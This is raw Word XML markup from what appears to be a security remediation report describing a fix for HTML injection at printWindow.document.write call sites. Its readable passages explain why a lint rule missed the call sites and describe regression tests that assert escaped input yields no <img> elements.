                                        <a:pt x="0" y="135976"/>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509" style="width:147pt;height:24.75pt;position:absolute;z-index:-2147483498;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:11.1562pt;mso-position-vertical-relative:text;margin-top:-1.60541pt;" coordsize="18669,3143">
                      <v:shape id="Shape 799" style="position:absolute;width:17811;height:1428;left:0;top:0;" coordsize="1781175,142875" path="m0,0l1771650,0c1774280,0,1776525,930,1778385,2784c1780245,4645,1781175,6893,1781175,9525l1781175,133350c1781175,135976,1780245,138218,1778385,140078c1776525,141939,1774280,142869,1771650,142875l0,142875l0,0x">
                        <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                        <v:fill on="true" color="#edf2f6"/>
                      </v:shape>
                      <v:shape id="Shape 805" style="position:absolute;width:18669;height:1428;left:0;top:1714;" coordsize="1866900,142875" path="m9525,0l1857375,0c1860005,0,1862250,930,1864110,2791c1865970,4651,1866900,6896,1866900,9525l1866900,133350c1866900,135976,1865970,138224,1864110,140084c1862250,141945,1860005,142875,1857375,142875l9525,142875c6895,142875,4650,141945,2790,140084c930,138224,0,135976,0,133350l0,9525c0,6896,930,4651,2790,2791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'document', property: '</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="005C54CB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>write'}</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="005C54CB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> only matches the bare </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="005C54CB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>identifier</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="005C54CB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="005C54CB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">document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Every call site in this application is </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="005C54CB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>printWindow.document.write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where the object is the member expression </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="005C54CB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>printWindow.document</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="005C54CB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> so the</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13314F57" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="3" w:right="119" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="005C54CB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>obvious</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="005C54CB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> rule silently matched </w:t>
            </w:r>
            <w:r w:rsidRPr="005C54CB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>none of the seven</w:t>
            </w:r>
            <w:r w:rsidRPr="005C54CB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>. The gate uses a custom AST selector instead. A security control that appears to work and does not is worse than none, because it stops anyone looking.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1ACF254D" w14:textId="77777777" w:rsidR="00C73B1A" w:rsidRDefault="00C73B1A">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="24" w:right="16"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="338998E0" w14:textId="1A67CA78" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
      <w:pPr>
        <w:spacing w:after="0"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15 regression tests. The central one parses the escaped payload with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>jsdom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> and asserts the browser sees </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>one</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40BA8D1C" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
      <w:pPr>
        <w:spacing w:after="345"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4F7EBF00" wp14:editId="4C724AA0">
                <wp:extent cx="6480126" cy="1152525"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="25895" name="Group 25895"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="6480126" cy="1152525"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="6480126" cy="1152525"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="834" name="Shape 834"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="266700"/>
                            <a:ext cx="6480126" cy="885825"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="6480126" h="885825">
                                <a:moveTo>
                                  <a:pt x="19050" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="6467474" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6470001" y="0"/>
                                  <a:pt x="6472430" y="484"/>
                                  <a:pt x="6474764" y="1445"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="6480126" y="5028"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6480126" y="880790"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6474764" y="884368"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6472430" y="885335"/>
                                  <a:pt x="6470001" y="885819"/>
                                  <a:pt x="6467474" y="885825"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="19050" y="885825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="16524" y="885819"/>
                                  <a:pt x="14094" y="885335"/>
                                  <a:pt x="11760" y="884368"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="9426" y="883400"/>
                                  <a:pt x="7366" y="882024"/>
                                  <a:pt x="5580" y="880244"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="3793" y="878452"/>
                                  <a:pt x="2417" y="876393"/>
                                  <a:pt x="1450" y="874061"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="866775"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="19050"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1450" y="11751"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="2417" y="9416"/>
                                  <a:pt x="3793" y="7358"/>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842" name="Rectangle 842"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="18371"/>
                            <a:ext cx="1438343" cy="148361"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="00B7B351" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:b/>
                                  <w:color w:val="0B2D56"/>
                                </w:rPr>
                                <w:t xml:space="preserve">text node and zero </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="843" name="Shape 843"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1085850" y="0"/>
                            <a:ext cx="342900" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="342900" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="333375" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="336005" y="0"/>
                                  <a:pt x="338250" y="930"/>
                                  <a:pt x="340110" y="2791"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="341970" y="4651"/>
                                  <a:pt x="342900" y="6896"/>
                                  <a:pt x="342900" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="342900" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="342900" y="135976"/>
                                  <a:pt x="341970" y="138218"/>
                                  <a:pt x="340110" y="140078"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="338250" y="141939"/>
                                  <a:pt x="336005" y="142869"/>
                                  <a:pt x="333375" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="142869"/>
                                  <a:pt x="4650" y="141939"/>
                                  <a:pt x="2790" y="140078"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="138218"/>
                                  <a:pt x="0" y="135976"/>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5463" name="Rectangle 25463"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1108472" y="23658"/>
                            <a:ext cx="77521" cy="140102"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="5FAC34F8" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:b/>
                                  <w:color w:val="0B2D56"/>
                                  <w:sz w:val="17"/>
                                </w:rPr>
                                <w:t>&lt;</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="25468" name="Rectangle 25468"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1166758" y="23658"/>
                            <a:ext cx="232563" cy="140102"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="77030AF9" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:proofErr w:type="spellStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:b/>
                                  <w:color w:val="0B2D56"/>
                                  <w:sz w:val="17"/>
                                </w:rPr>
                                <w:t>img</w:t>
                              </w:r>
                              <w:proofErr w:type="spellEnd"/>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="25467" name="Rectangle 25467"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1341618" y="23658"/>
                            <a:ext cx="77521" cy="140102"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="1823A563" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:b/>
                                  <w:color w:val="0B2D56"/>
                                  <w:sz w:val="17"/>
                                </w:rPr>
                                <w:t>&gt;</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="845" name="Rectangle 845"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1426964" y="18371"/>
                            <a:ext cx="728189" cy="148361"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="6DF987EA" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:b/>
                                  <w:color w:val="0B2D56"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> elements</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="846" name="Rectangle 846"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1974503" y="18371"/>
                            <a:ext cx="3553238" cy="148361"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="65629AEC" w14:textId="4F7A1AED" w:rsidR="00345BB3" w:rsidRPr="00C73B1A" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                                <w:rPr>
                                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:t xml:space="preserve"> </w:t>
                              </w:r>
                              <w:r w:rsidR="00C73B1A">
                                <w:rPr>
                                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                                </w:rPr>
                                <w:t xml:space="preserve">: </w:t>
                              </w:r>
                              <w:proofErr w:type="gramStart"/>
                              <w:r w:rsidRPr="00C73B1A">
                                <w:rPr>
                                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                                </w:rPr>
                                <w:t>a structural</w:t>
                              </w:r>
                              <w:proofErr w:type="gramEnd"/>
                              <w:r w:rsidRPr="00C73B1A">
                                <w:rPr>
                                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> proof rather than a substring check:</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="847" name="Rectangle 847"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="100757" y="412201"/>
                            <a:ext cx="2752587" cy="130914"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="715ACDA6" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>expect(escaped</w:t>
                              </w:r>
                              <w:proofErr w:type="gramStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>).</w:t>
                              </w:r>
                              <w:proofErr w:type="spellStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>not</w:t>
                              </w:r>
                              <w:proofErr w:type="gramEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>.</w:t>
                              </w:r>
                              <w:proofErr w:type="gramStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>toMatch</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&lt;&gt;"']/);</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="848" name="Rectangle 848"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="100757" y="583651"/>
                            <a:ext cx="4491064" cy="130914"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="1003AD3A" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:proofErr w:type="spellStart"/>
                              <w:proofErr w:type="gramStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>host.innerHTML</w:t>
                              </w:r>
                              <w:proofErr w:type="spellEnd"/>
                              <w:proofErr w:type="gramEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> = `&lt;div class="product-name"&gt;${escaped}&lt;/div&gt;`;</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="849" name="Rectangle 849"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="100757" y="755101"/>
                            <a:ext cx="3839135" cy="130914"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="7B359736" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>expect(</w:t>
                              </w:r>
                              <w:proofErr w:type="spellStart"/>
                              <w:proofErr w:type="gramStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>host.querySelectorAll</w:t>
                              </w:r>
                              <w:proofErr w:type="spellEnd"/>
                              <w:proofErr w:type="gramEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>("</w:t>
                              </w:r>
                              <w:proofErr w:type="spellStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>img</w:t>
                              </w:r>
                              <w:proofErr w:type="spellEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>")</w:t>
                              </w:r>
                              <w:proofErr w:type="gramStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>).</w:t>
                              </w:r>
                              <w:proofErr w:type="spellStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>toHaveLength</w:t>
                              </w:r>
                              <w:proofErr w:type="spellEnd"/>
                              <w:proofErr w:type="gramEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>(0);</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
